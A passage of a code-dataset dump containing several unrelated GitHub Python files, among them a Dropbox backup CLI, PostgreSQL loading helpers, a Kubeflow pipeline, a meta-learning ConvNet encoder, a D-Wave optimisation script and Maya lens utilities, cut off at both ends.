list(FakeAsgiHandler.chunk_bytes(b\"12345678901234567890123456789\"))\n self.assertEqual(len(result), 1)\n self.assertEqual(result[0][0], b\"12345678901234567890123456789\")\n self.assertEqual(result[0][1], True)\n # Exactly chunk size\n result = list(FakeAsgiHandler.chunk_bytes(b\"123456789012345678901234567890\"))\n self.assertEqual(len(result), 1)\n self.assertEqual(result[0][0], b\"123456789012345678901234567890\")\n self.assertEqual(result[0][1], True)\n # Just above chunk size\n result = list(FakeAsgiHandler.chunk_bytes(b\"123456789012345678901234567890a\"))\n self.assertEqual(len(result), 2)\n self.assertEqual(result[0][0], b\"123456789012345678901234567890\")\n self.assertEqual(result[0][1], False)\n self.assertEqual(result[1][0], b\"a\")\n self.assertEqual(result[1][1], True)\n","repo_name":"trb116/pythonanalyzer","sub_path":"data/input/andrewgodwin/channels/channels/tests/test_handler.py","file_name":"test_handler.py","file_ext":"py","file_size_in_byte":4136,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"30495743165","text":"from settings import IGNORE_DIRS, IGNORE_FILES\nfrom DBoxConnection import DBoxConnection\nfrom datetime import datetime, time\nfrom crontab import CronTab\nfrom pathlib import Path\nimport logging\nimport dropbox\nimport shutil\nimport click\nimport os\n\n\n\n@click.command()\n@click.option(\n \"--from-dir\",\n help=\"Directory to backup/watch if --automatic-sync is enabled\",\n type=click.Path(exists=True),\n required=True \n)\n@click.option(\n \"--to-dir\",\n help=\"Root directory to store the backup\",\n type=click.Path(exists=False),\n required=True\n)\n@click.option(\n \"--backup-start\",\n help=\"Perform the backup in the given time interval (in minutes)\",\n type=click.INT,\n required=True\n)\n@click.option(\n \"--frequency-interval\",\n help=\"Interval of time (in minutes) to perform the backups\",\n type=click.INT,\n required=True\n)\n@click.option(\n \"--automatic-backup\",\n 
help=\"Whether to perform or not automatic back ups by using cron jobs\",\n type=click.BOOL,\n required=True\n)\n@click.option(\n \"--upload-zip\",\n help=\"If the backup will be uploaded as a zipped file\",\n type=click.BOOL,\n required=True\n)\ndef main(from_dir, to_dir, backup_start, frequency_interval, automatic_backup, upload_zip):\n \"\"\"\n A command line backup tool to keep your files stored at dropbox by using its API. \n It runs at given time intervals specified by the user and can perform automatic\n backups using cronjobs\n \"\"\"\n\n FROM_DIR = Path(from_dir)\n TO_DIR = Path(to_dir)\n BACKUP_START_TIME = backup_start\n FREQUENCY_INTERVAL = frequency_interval\n AUTOMATIC_BACKUP = automatic_backup\n\n logging.basicConfig(\n filename=\"./backup.log\",\n format=\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\",\n level=logging.INFO\n )\n\n\n # Dropbox connection object\n # Handling the backup folder creation skip if already exist \n dbox = DBoxConnection()\n \n if dbox.validate_token():\n logging.info(\"The dropbox auth token is valid\")\n else:\n logging.error(\"The dropbox token is not valid, get a new one\")\n\n if TO_DIR.name not in dbox.get_dirs(\"\", only_names=True, recursive=False):\n dbox.create_folder(TO_DIR)\n logging.info(\"The backup directory %s was created in dropbox\")\n else:\n logging.warning(\"The backup directory %s already exists in dropbox\", TO_DIR)\n\n\n # Setting up the cron jobs \n # cron = CronTab(user=True)\n # job = cron.new(command=\"\")\n # job.setall(datetime(year, month, day, hour, minute))\n # datetime.strptime(date_string=)\n\n click.secho(f\"Backing up {str(FROM_DIR)} into {str(TO_DIR)} at {str(BACKUP_START_TIME)} every {str(FREQUENCY_INTERVAL)}\", fg=\"green\")\n\n # Traverse the directory to backup, skip the files and dirs that must be ignored\n VISITED = []\n TMP_DIR = Path.cwd()/\"tmp\"\n try:\n os.mkdir(TMP_DIR)\n except:\n pass\n\n if upload_zip:\n BUILD_PATH = list(TMP_DIR.parts)\n else:\n BUILD_PATH = list(TO_DIR.parts)\n\n print(\"Starting build path = \", BUILD_PATH)\n\n for root, dirs, files in os.walk(FROM_DIR):\n CURRENT_DIR = os.path.basename(root)\n logging.info(\"Visiting %s\", root)\n print(\"Build path -> \", BUILD_PATH)\n if CURRENT_DIR in VISITED:\n VISITED.remove(CURRENT_DIR)\n PARENT_DIR = (\"/\".join(BUILD_PATH))[1:]\n print(PARENT_DIR)\n if upload_zip:\n if CURRENT_DIR not in os.listdir(PARENT_DIR):\n _ = BUILD_PATH.pop()\n else:\n if CURRENT_DIR not in dbox.get_dirs(PARENT_DIR, only_names=True, recursive=False):\n _ = BUILD_PATH.pop()\n BUILD_PATH.append(CURRENT_DIR)\n \n if files:\n os.chdir(root)\n logging.info(\"%s has %s files\", CURRENT_DIR, len(files))\n for FILE in files:\n print(\"File = \", FILE)\n if FILE not in IGNORE_FILES:\n if upload_zip:\n shutil.copy(FILE, \"/\".join(BUILD_PATH)[1:]+\"/\")\n else: \n with open(FILE, 'rb') as f:\n try:\n dbox.upload_content(file=f.read(), path=\"/\".join(BUILD_PATH)[1:]+\"/\"+f.name)\n print(\"File uploaded\")\n except dropbox.exceptions.ApiError as error:\n if error.error.is_path():\n logging.error(\"Path error\")\n else:\n logging.warning(\"Ignoring the file %s\", FILE)\n\n if dirs:\n logging.info(\"%s has %s files\", CURRENT_DIR, len(dirs))\n for DIR in dirs:\n if DIR not in IGNORE_DIRS:\n VISITED.append(DIR)\n try:\n if upload_zip:\n os.mkdir(\"/\".join(BUILD_PATH)[1:]+\"/\"+DIR)\n else:\n dbox.create_folder(\"/\".join(BUILD_PATH)[1:]+\"/\"+DIR) \n logging.info(\"Creating folder %s at %s\", DIR, \"/\".join(BUILD_PATH)[1:])\n except:\n logging.warning(\"Folder %s 
already exist at %s\", DIR, \"/\".join(BUILD_PATH)[1:])\n else:\n logging.warning(\"Ignoring %s directory\", DIR)\n else:\n logging.info(\"%s has no directories\", CURRENT_DIR)\n if CURRENT_DIR not in IGNORE_DIRS:\n BUILD_PATH.remove(CURRENT_DIR)\n\n\nif __name__ == \"__main__\":\n main()\n\n\n# python backup.py --from-dir \"/home/sjukdom/_Narasimha_/_forbackup_/\" --to-dir \"/Backup\" --backup-start 60 --frequency-interval 120 --automatic-backup false","repo_name":"daniel-sjkdm/BackupMySys","sub_path":"backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":5792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24720068367","text":"import sys\nimport os\nsys.path.insert(0, os.path.dirname(__file__))\nfrom dataclasses import dataclass\nfrom SQLAlchemyConnection import SQLAlchemyConnection\nfrom PsycopgConnection import PsycopgConnection\nfrom files_utilities import get_abs_path, get_all_files_in_dir, parse_file_name_from_path\nimport psycopg2\nimport psycopg2.extensions\nimport logging\nfrom dotenv import load_dotenv\nfrom sqlalchemy.engine import Engine\nimport pandas as pd\n\n@dataclass\nclass DogAnswer:\n dog_id: int\n question_id: int\n answer_id: int\n\n\ndef csv_to_postgres(psyco: PsycopgConnection, file_path: str, *, table_name: str | None = None) -> None:\n \"\"\"Read csv file and insert to postgres database table\"\"\"\n # set table name from file name or argument\n table_name = table_name if table_name else parse_file_name_from_path(\n path=file_path, file_type=\".csv\")\n\n # use cursor\n with psyco.get_cursor() as cursor:\n\n # open csv and skip header line\n with open(file_path, ) as csv_file:\n next(csv_file)\n\n # copy csv to table\n cursor.copy_from(csv_file, table_name, sep=',', null=\"null\")\n\n\ndef create_tables_from_file(psyco: PsycopgConnection, file_path: str) -> None:\n \"\"\"Create tables from sql file\"\"\"\n # execute create tables file\n with open(file_path) as file:\n psyco.execute_command(file.read())\n\n\ndef drop_table(psyco: PsycopgConnection, table_name: str) -> None:\n \"\"\"Drop table with specified name\"\"\"\n psyco.execute_command(f\"DROP TABLE IF EXISTS {table_name}\")\n\n\ndef delete_table_data(psyco: PsycopgConnection, table_name: str) -> None:\n \"\"\"Delete all rows from table\"\"\"\n psyco.execute_command(f\"DELETE FROM {table_name};\")\n\n\ndef update_tables_from_csv_directory(csv_files: list[str]) -> None:\n \"\"\"Update tables from csv files\"\"\"\n # iterate over files paths\n for csv_path in csv_files:\n # get table name\n table_name = parse_file_name_from_path(csv_path, \".csv\")\n\n # delete existing data from table if exists and update data from file\n try:\n delete_table_data(table_name)\n csv_to_postgres(get_abs_path(csv_path))\n # log if the table not exists\n except psycopg2.errors.UndefinedTable:\n logging.error(f\"Error updating table {table_name}\")\n\n\ndef get_xlsx_df(file_path: str) -> pd.DataFrame:\n \"\"\"Read xlsx file with pandas\"\"\"\n return pd.read_excel(get_abs_path(file_path))\n\n\ndef df_to_postgres(df: pd.DataFrame, table_name: str, engine: Engine) -> None:\n \"\"\"Use pandas to_sql to update table\"\"\"\n rows_count = df.to_sql(table_name, con=engine,\n if_exists='replace', index=False)\n logging.info(f\"updated {rows_count} rows for {table_name} table\")\n\n\ndef xlsx_to_postgres(file_path: str, *, table_name: str | None = None) -> None:\n \"\"\"Read xlsx file and insert to postgres database table\"\"\"\n # set table name from file name 
or argument\n table_name = table_name if table_name else parse_file_name_from_path(\n path=file_path, file_type=\".xlsx\")\n\n # get data frame\n df = get_xlsx_df(file_path)\n\n # use sqlalchemy engine\n with SQLAlchemyConnection().get_engine() as engine:\n # update table\n df_to_postgres(df, table_name, engine)\n\n\ndef update_tables_from_xlsx_directory(xlsx_files: list[str]) -> None:\n \"\"\"update tables from xlsx files\"\"\"\n # iterate through files paths and update tables\n for xlsx_path in xlsx_files:\n xlsx_to_postgres(xlsx_path)\n\n\ndef main() -> None:\n # load .env variables\n load_dotenv()\n\n # create logger\n logging.basicConfig(level=logging.INFO)\n\n\n # get dict from query\n psyco = PsycopgConnection(os.environ.get(\"DB_URL\"))\n # with psyco.get_cursor() as cursor:\n # cursor.execute(\"select * from sections\")\n # print(psyco.get_dict(cursor))\n\n # sections = process_get_sections_ids()\n # section = get_section_by_id(sections[0])\n # print(section)\n\n\n # with PsycopgConnection().get_cursor() as cursor:\n # cursor.execute(\"select * from sections\")\n # print(cursor.fetchall())\n # insert from csv\n # csv_file_path = get_abs_path(\"./csv_files/questions.csv\")\n # drop_table(psyco, \"dog_questionnaires\")\n\n # create_tables_from_file(psyco, get_abs_path(\"./create_tables.sql\"))\n\n # csv_to_postgres(csv_file_path)\n\n # csv_files = get_all_files_in_dir(\n # get_abs_path(\"./csv_files\"), file_type=\".csv\")\n # update_tables_from_csv_directory(csv_files)\n\n # xlsx_files = get_all_files_in_dir(path=get_abs_path(\"./xlsx_files\"),\n # file_type=\".xlsx\")\n # update_tables_from_xlsx_directory(xlsx_files)\n\n # [create_dog_answer(1, 1, 5)]\n # cmd = \"insert into dog_questionnaires (dog_id, question_id, answer_score) values (%s, %s, %s)\"\n # commands = [(cmd, (1, 1, 5)), (cmd, (2, 1, 5)),\n # (cmd, (3, 1, 5)), (\"select * from dogs\", tuple())]\n # cmds = [create_dog_answer(1, 1, 5), create_dog_answer(1, 1, 5)]\n # print(cmds)\n # PsycopgConnection().execute_command(*create_dog_answer(1, 1, 5))\n\n\n # for file in xlsx_files:\n # drop_table(parse_file_name_from_path(path=file, file_type=\".xlsx\"))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"johnnie172/dogs-behavioral-app","sub_path":"backend/data_base/db_actions.py","file_name":"db_actions.py","file_ext":"py","file_size_in_byte":5219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15930988395","text":"import kfp\n@kfp.components.func_to_container_op\ndef print_func(param: int):\n print(str(param))\n@kfp.components.func_to_container_op\ndef list_func(param: int) -> list:\n return list(range(param))\n@kfp.dsl.pipeline(name='pipeline')\ndef pipeline(param: int):\n list_func_op = list_func(param)\n with kfp.dsl.ParallelFor(list_func_op.output) as param:\n print_func(param)\nif __name__ == '__main__':\n workflow_dict = kfp.compiler.Compiler()._create_workflow(pipeline)\n workflow_dict['metadata']['namespace'] = \"argo\"\n del workflow_dict['spec']['serviceAccountName']\n kfp.compiler.Compiler._write_workflow(workflow_dict, 'pipe.yaml')","repo_name":"shamiulshifat/kubeflow-practices","sub_path":"supabase-titanic/ARGO/test-codes/titanic-pipeline/argo_example.py","file_name":"argo_example.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"36016787932","text":"import csv\nfrom pathlib import Path\nfrom datetime import datetime\n\nimport numpy as 
np\nfrom dateutil.parser import parse\nfrom intervaltree import IntervalTree\n\nimport astropy.units as u\nfrom astropy.table import QTable, Table\n\nfrom stixcore.config.data_types import EnergyChannel\n\n__all__ = ['read_energy_channels', 'read_subc_params']\n\nSCI_INDEX = None\nSCI_CHANNELS = {}\n\n\ndef float_def(value, default=np.inf):\n \"\"\"Parse the value into a float or return the default value.\n\n Parameters\n ----------\n value : `str`\n the value to parse\n default : `double`, optional\n default value to return in case of pasring errors, by default numpy.inf\n\n Returns\n -------\n `double`\n the parsed value\n \"\"\"\n try:\n return float(value)\n except ValueError:\n return default\n\n\ndef int_def(value, default=0):\n \"\"\"Parse the value into a int or return the default value.\n\n Parameters\n ----------\n value : `str`\n the value to parse\n default : `int`, optional\n default value to return in case of pasring errors, by default 0\n\n Returns\n -------\n `int`\n the parsed value\n \"\"\"\n try:\n return int(value)\n except ValueError:\n return default\n\n\ndef get_sci_channels(date):\n r\"\"\"\n Get the science energy channel info for given date\n\n Parameters\n ----------\n date : `datetime.datetime`\n\n Returns\n -------\n `astropy.table.QTable`\n Science Energy Channels\n \"\"\"\n global SCI_INDEX, SCI_CHANNELS\n\n # Cache index\n if SCI_INDEX is None:\n root = Path(__file__).parent.parent\n sci_chan_index_file = Path(root, *['config', 'data', 'common',\n 'detector', 'science_echan_index.csv'])\n sci_chan_index = read_energy_channel_index(sci_chan_index_file)\n SCI_INDEX = sci_chan_index\n\n sci_info = SCI_INDEX.at(date)\n if len(sci_info) == 0:\n raise ValueError(f'No Science Energy Channel file found for date {date}')\n elif len(sci_info) > 1:\n raise ValueError(f'Multiple Science Energy Channel file for date {date}')\n start_date, end_date, sci_echan_file = list(sci_info)[0]\n\n # Cache sci channels\n if sci_echan_file.name in SCI_CHANNELS:\n sci_echan_table = SCI_CHANNELS[sci_echan_file.name]\n else:\n sci_echan_table = read_sci_energy_channels(sci_echan_file)\n SCI_CHANNELS[sci_echan_file.name] = sci_echan_table\n\n return sci_echan_table\n\n\ndef read_energy_channel_index(echan_index_file):\n r\"\"\"\n Read science energy channel index file\n\n Parameters\n ----------\n echan_index_file: `str` or `pathlib.Path`\n\n Returns\n -------\n Science Energy Channel lookup\n \"\"\"\n echans = Table.read(echan_index_file)\n echan_it = IntervalTree()\n for i, start, end, file in echans.iterrows():\n date_start = parse(start)\n date_end = parse(end) if end != 'none' else datetime(2100, 1, 1)\n echan_it.addi(date_start, date_end, echan_index_file.parent / file)\n return echan_it\n\n\ndef read_sci_energy_channels(path):\n \"\"\"\n Read science energy channel definitions.\n\n Parameters\n ----------\n path : `pathlib.Path`\n path to the config file\n\n Returns\n -------\n `astropy.table.QTable`\n The science energy channels\n \"\"\"\n converters = {'Channel Number': int,\n 'Channel Edge': float,\n 'Energy Edge': float,\n 'Elower': float,\n 'Eupper': float,\n 'BinWidth': float,\n 'dE/E': float,\n 'QL channel': int}\n\n # tuples of (<match string>, '0')\n bad_data = (('max ADC', '0'), ('maxADC', '0'), ('n/a', '0'), ('', '0'))\n sci_chans = QTable.read(path, delimiter=',', data_start=24, header_start=21,\n converters=converters, fill_values=bad_data)\n # set units can't use list comp\n for col in ['Elower', 'Eupper', 'BinWidth']:\n sci_chans[col].unit = u.keV\n return 
sci_chans\n\n\ndef read_energy_channels(path):\n \"\"\"Read the energy channels from the configuration file.\n\n Parameters\n ----------\n path : `pathlib.Path`\n path to the config file\n\n Returns\n -------\n `dict`\n set of `EnergyChannel` accessible by index\n \"\"\"\n energy_channels = dict()\n\n with open(path, newline='') as csvfile:\n csvreader = csv.reader(csvfile, dialect='excel')\n for _ in range(24):\n next(csvreader)\n\n for row in csvreader:\n idx = int_def(row[0], -1)\n if idx == -1:\n continue\n energy_channels[idx] = EnergyChannel(\n channel_edge=int_def(row[1]),\n energy_edge=int_def(row[2]),\n e_lower=float_def(row[3]),\n e_upper=float_def(row[4]),\n bin_width=float_def(row[5]),\n dE_E=float_def(row[6])\n )\n\n return energy_channels\n\n\ndef read_subc_params(path):\n \"\"\"Read the configuration of the sub-collimator from the configuration file.\n\n Parameters\n ----------\n path : `pathlib.Path`\n path to the config file\n\n Returns\n -------\n `Table`\n params for all 32 sub-collimators\n \"\"\"\n return Table.read(path, format='ascii')\n","repo_name":"i4Ds/STIXCore","sub_path":"stixcore/config/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":5305,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"71586883681","text":"import json\n\nfrom airone.celery import app\nfrom job.models import Job\nfrom role.models import Role\n\n\n@app.task(bind=True)\ndef edit_role_referrals(self, job_id):\n job = Job.objects.get(id=job_id)\n\n if job.proceed_if_ready():\n job.update(job.STATUS[\"PROCESSING\"])\n params = json.loads(job.params)\n role = Role.objects.get(id=params[\"role_id\"])\n\n for entry in [x for x in role.get_referred_entries()]:\n entry.register_es()\n\n job.update(Job.STATUS[\"DONE\"])\n","repo_name":"dmm-com/airone","sub_path":"role/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"54"} +{"seq_id":"27657516150","text":"from collections import OrderedDict\n\nimport torch.nn as nn\n\nfrom .encoders import register\nfrom ..modules import *\n\n\n__all__ = ['convnet4', 'wide_convnet4']\n\n\nclass ConvBlock(Module):\n def __init__(self, in_channels, out_channels, bn_args):\n super(ConvBlock, self).__init__()\n self.in_channels = in_channels\n self.out_channels = out_channels\n\n self.conv = Conv2d(in_channels, out_channels, 3, 1, padding=1)\n self.bn = BatchNorm2d(out_channels, **bn_args)\n self.relu = nn.ReLU(inplace=True)\n self.pool = nn.MaxPool2d(2)\n\n def forward(self, x, params=None, episode=None):\n out = self.conv(x, get_child_dict(params, 'conv'))\n out = self.bn(out, get_child_dict(params, 'bn'), episode)\n out = self.pool(self.relu(out))\n return out\n\n\nclass ConvNet4(Module):\n def __init__(self, hid_dim, out_dim, bn_args):\n super(ConvNet4, self).__init__()\n self.hid_dim = hid_dim\n self.out_dim = out_dim\n\n episodic = bn_args.get('episodic') or []\n bn_args_ep, bn_args_no_ep = bn_args.copy(), bn_args.copy()\n bn_args_ep['episodic'] = True\n bn_args_no_ep['episodic'] = False\n bn_args_dict = dict()\n for i in [1, 2, 3, 4]:\n if 'conv%d' % i in episodic:\n bn_args_dict[i] = bn_args_ep\n else:\n bn_args_dict[i] = bn_args_no_ep\n\n self.encoder = Sequential(OrderedDict([\n ('conv1', ConvBlock(3, hid_dim, bn_args_dict[1])),\n ('conv2', ConvBlock(hid_dim, hid_dim, bn_args_dict[2])),\n ('conv3', ConvBlock(hid_dim, hid_dim, bn_args_dict[3])),\n ('conv4', 
ConvBlock(hid_dim, out_dim, bn_args_dict[4])),\n ]))\n\n def get_out_dim(self, scale=25):\n return self.out_dim * scale\n\n def forward(self, x, params=None, episode=None):\n out = self.encoder(x, get_child_dict(params, 'encoder'), episode)\n out = out.view(out.shape[0], -1)\n return out\n\n\n@register('convnet4')\ndef convnet4(bn_args=dict()):\n return ConvNet4(32, 32, bn_args)\n\n\n@register('wide-convnet4')\ndef wide_convnet4(bn_args=dict()):\n return ConvNet4(64, 64, bn_args)","repo_name":"fmu2/PyTorch-MAML","sub_path":"models/encoders/convnet4.py","file_name":"convnet4.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":171,"dataset":"github-code","pt":"54"} +{"seq_id":"23263185887","text":"\n\ndef convert_text_to_json_format(input_file_path, output_file_path):\n with open(input_file_path, 'r', encoding='utf-8') as infile, open(output_file_path, 'w', encoding='utf-8') as outfile:\n outfile.write(\"[\\n\")\n first = True\n\n while True:\n title = infile.readline().strip().replace('\"', '\\\\\"')\n if not title:\n break\n content = infile.readline().strip().replace('\"', '\\\\\"')\n\n # Skip the empty line between entries\n infile.readline()\n\n if not first:\n outfile.write(\",\\n\")\n else:\n first = False\n\n formatted_entry = f' {{\\n \"prompt\": \"{title}\",\\n \"completion\": \"\\'{content}\"\\n }}'\n outfile.write(formatted_entry)\n\n outfile.write(\"\\n]\")\n\n# Usage example\ninput_file_path = \"result/mediGate/medigate.txt\"\noutput_file_path = \"result/mediGate/medigate_convert.txt\"\nconvert_text_to_json_format(input_file_path, output_file_path)\nprint(\"Job Done!\")\n","repo_name":"harion01/naverAskCrawler","sub_path":"textConvertUtil.py","file_name":"textConvertUtil.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"29730965403","text":"#!/usr/bin/python3\n\nimport csv\nimport numpy\n\nimport math\n\nimport dwavebinarycsp\nimport dwave.inspector\nimport dimod\nimport random\nfrom dwave.system import EmbeddingComposite, DWaveSampler, LeapHybridDQMSampler\nfrom dimod import DiscreteQuadraticModel\n\n############################################################\n## ETL / preprocessing of municipalities data\n\ncsvDataFile = open('kta_20210327-131158.csv')\ncsvReader = csv.reader(csvDataFile, delimiter=';')\n\nheaders = next(csvReader)\nheaders = [1,2,3,4,5,6,7,8,9,10,11,12,13,14]\ndata_num = 0;\ndata_elem = 0\ndata = numpy.array([1,2,3,4,5,6,7,8,9,10,11,12,13,14])\nxdata = numpy.array([[1,2,3,4,5,6,7,8,9,10,11,12,13,14]])\n\nfor row in csvReader:\n data[data_elem] = float(row[2])\n if(data_num == 0):\n headers[data_elem] = row[1]\n\n data_elem = data_elem + 1\n if(data_elem >= 14):\n xdata = numpy.append(xdata, [data], 0)\n data_elem = 0\n data_num += 1\n\nxdata = numpy.delete(xdata, [0], 0)\n\n# swap 1st and 3rd row with each other\nxdata[:,[0,2]] = xdata[:,[2,0]]\ntmp = headers[0]\nheaders[0] = headers[2]\nheaders[2] = tmp\n\nprint(headers)\nprint(xdata)\n\n# data is now numpy array, first element is the target value\n# next: discretizes other 13 fields into 1 bin indicator variables (smaller or larger than mean)\n\nddata = xdata\n\nmean = numpy.mean(xdata, 0)\nstdev = numpy.std(xdata, 0)\n\nrows, cols = xdata.shape\n\nprint(\"{} rows and {} cols of data\".format(rows, cols))\n\nprint(mean)\n\n######################################################################\n# normalize maximized first variable to be zero mean 
and unit variance\n\nfor row in range(rows):\n ddata[row][0] = (ddata[row][0] - mean[0]) / stdev[0];\n\n######################################################################\n# next calculates E[Y|x_j,x_i] used for optimization, we discretize variables\n# to N BINS: (2*sigma/(N/2) = tick length) except the first one which will be target variable\n\nBINS = 6\n\nfor row in range(rows):\n for col in range(1,cols):\n bin = int((xdata[row][col]-mean[col])/(2*stdev[col]/(BINS/2)))\n bin = bin + BINS\n if(bin >= BINS):\n bin = BINS-1\n if(bin <= 0):\n bin = 0\n ddata[row][col] = bin; # discrete variable between 0...(BIN-1)\n\nprint(ddata)\n\n# two variable model\nEY = {}\n\n# negative sign to maximize target (we minimize model energy)\nfor k in range(BINS):\n for l in range(BINS):\n for i in range(1, cols):\n for j in range(1, cols):\n EY[(i,k,j,l)] = 0.0\n for r in range(rows):\n if(ddata[r][i] == k and ddata[r][j] == l):\n EY[(i,k,j,l)] = EY[(i,k,j,l)] - ddata[r][0]/rows\n\n \n# single variable model \nEY2 = {}\n\nfor k in range(BINS):\n for i in range(1, cols):\n EY2[(i,k)] = 0.0\n for r in range(rows):\n if(ddata[r][i] == k):\n EY2[(i,k)] = EY2[(i,k)] - ddata[r][0]/rows\n\n\n# We minimize E[Y] so we use negative sign to actually maximize E[Y]\nprint(EY)\nprint(EY2)\n\n#####################################################################\n## D-WAVE sampler solver part\n\n# now transform E[Y|x_j,x_i] data to Ising model Jji, hj parameters\n# UPDATE: We use BQM model so we can use E[Y|x_j,x_i] values directly\n\ndqm = dimod.DiscreteQuadraticModel()\n\nfor p in range(1,len(headers)):\n dqm.add_variable(BINS, label=headers[p])\n\nfor p0 in range(1,len(headers)):\n v0 = headers[p0]\n\n EY2map = [0 for i in range(BINS)] \n\n for k in range(BINS):\n EY2map[k] = EY2[(p0,k)]\n\n print(v0) \n print(EY2map) \n \n dqm.set_linear(v0, EY2map)\n \n \n for p1 in range(1, p0):\n v1 = headers[p1]\n\n EYmap = {}\n for k in range(BINS):\n for l in range(BINS): # BINS\n EYmap[(k,l)] = EY[(p0,k,p1,l)]\n\n dqm.set_quadratic(v0, v1, EYmap)\n\n\nprint(\"Sampling model..\")\n\nsampler = LeapHybridDQMSampler()\n\nsampleset = sampler.sample_dqm(dqm, label='Municipalities best income')\n\n#sampler = EmbeddingComposite(DWaveSampler())\n#sampleset = sampler.sample(bqm,\n# chain_strength=4,\n# num_reads=1000,\n# label='BQM/Ising model test')\n\nbest_sample = sampleset.first.sample\nbest_energy = sampleset.first.energy\n\nprint(best_sample, headers[0], -best_energy)\n\n\n\n\n\n","repo_name":"cslr/kunnat","sub_path":"etl_data.py","file_name":"etl_data.py","file_ext":"py","file_size_in_byte":4389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71936313763","text":"import maya.cmds\n\nimport mmSolver.logger\nimport mmSolver.api as mmapi\n\nLOG = mmSolver.logger.get_logger()\n\n\ndef create_marker_connections(cam):\n \"\"\"\n Create connections between the camera and markers.\n\n Adds a special lens attribute to the camera. 
This dynamic lens\n attribute will fan-out and connect to each Marker as needed.\n \"\"\"\n assert isinstance(cam, mmapi.Camera)\n\n # Get all markers under the camera.\n mkr_list = cam.get_marker_list()\n mkr_nodes = [mkr.get_node() for mkr in mkr_list]\n\n for mkr_node in mkr_nodes:\n dst = mkr_node + '.inLens'\n conns = (\n maya.cmds.listConnections(\n dst,\n source=True,\n destination=False,\n connections=True,\n plugs=True,\n )\n or []\n )\n src_list = conns[1::2]\n dst_list = conns[0::2]\n for src, dst in zip(src_list, dst_list):\n maya.cmds.disconnectAttr(src, dst)\n\n # Ensure Marker have connections to the camera lens.\n cam_shp = cam.get_shape_node()\n for mkr_node in mkr_nodes:\n src = cam_shp + '.outLens'\n dst = mkr_node + '.inLens'\n if not maya.cmds.isConnected(src, dst):\n maya.cmds.connectAttr(src, dst)\n return\n\n\ndef create_lens_on_camera(cam, force_create_new=None):\n \"\"\"\n Create a lens node and connect it to the given camera.\n\n :param cam: The camera to create a lens for.\n :type cam: mmSolver.api.Camera\n\n :param force_create_new: Should the function create a new lens\n node, even if a node already exists?\n :type force_create_new: bool or None\n\n :rtype: mmSolver.api.Lens\n \"\"\"\n assert isinstance(cam, mmapi.Camera)\n if force_create_new is None:\n force_create_new = False\n assert isinstance(force_create_new, bool)\n create_marker_connections(cam)\n lens = cam.get_lens()\n if lens is None or force_create_new is True:\n lens = mmapi.Lens().create_node()\n cam.set_lens(lens)\n return lens\n\n\ndef add_lens_layer_on_camera(cam):\n \"\"\"\n Create a new lens node as a 'layer' on the the given camera.\n\n :param cam: The camera to create a lens for.\n :type cam: mmSolver.api.Camera\n\n :rtype: mmSolver.api.Lens\n \"\"\"\n assert isinstance(cam, mmapi.Camera)\n create_marker_connections(cam)\n lens = None\n existing_lens = cam.get_lens()\n if existing_lens is None:\n lens = mmapi.Lens().create_node()\n cam.set_lens(lens)\n else:\n assert isinstance(cam, mmapi.Camera)\n lens = mmapi.Lens().create_node()\n cam.set_lens(lens)\n lens.set_input_lens(existing_lens)\n return lens\n","repo_name":"david-cattermole/mayaMatchMoveSolver","sub_path":"python/mmSolver/tools/createlens/lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"54"} +{"seq_id":"568194023","text":"import pandas as pd\r\nimport numpy as np\r\n\r\n\r\na = pd.Series([1, 2, 3, np.nan, 4])\r\ns = pd.Series(['A', 'B', 'C', 'Aaba', 'Baca', np.nan, 'CABA', 'dog', 'cat'])\r\nb = pd.date_range('20130101', periods=6)\r\nc = pd.DataFrame(np.random.randn(6, 4), index=b, columns=list('ABCD'))\r\ndf = pd.DataFrame(np.random.randn(10, 4))\r\npieces = [df[:3], df[3:7], df[7:]]\r\n# print(df)\r\n# print(pd.concat(pieces))\r\n\r\ndf = pd.DataFrame({'foo': ['one', 'one', 'one', 'two', 'two', 'two'],\r\n 'bar': ['A', 'B', 'C', 'A', 'B', 'C'],\r\n 'baz': [1, 2, 3, 4, 5, 6],\r\n 'zoo': ['x', 'y', 'z', 'q', 'w', 't']})\r\nd = df.pivot(index='foo', columns='bar', values=['baz', 'zoo'])\r\ne = df.stack()\r\nf = df.melt(id_vars='foo', value_vars=['bar', 'baz'])\r\n# pd.pivot_table(df, values='zoo', index='bar', columns='foo')\r\npd.cut(a, bins=3)\r\npd.factorize(a)\r\ns.str.len()\r\n# df.corr(method=\"spearman\")\r\n# df.expanding(min_periods=5).sum()\r\n# a = df.groupby(['foo', 
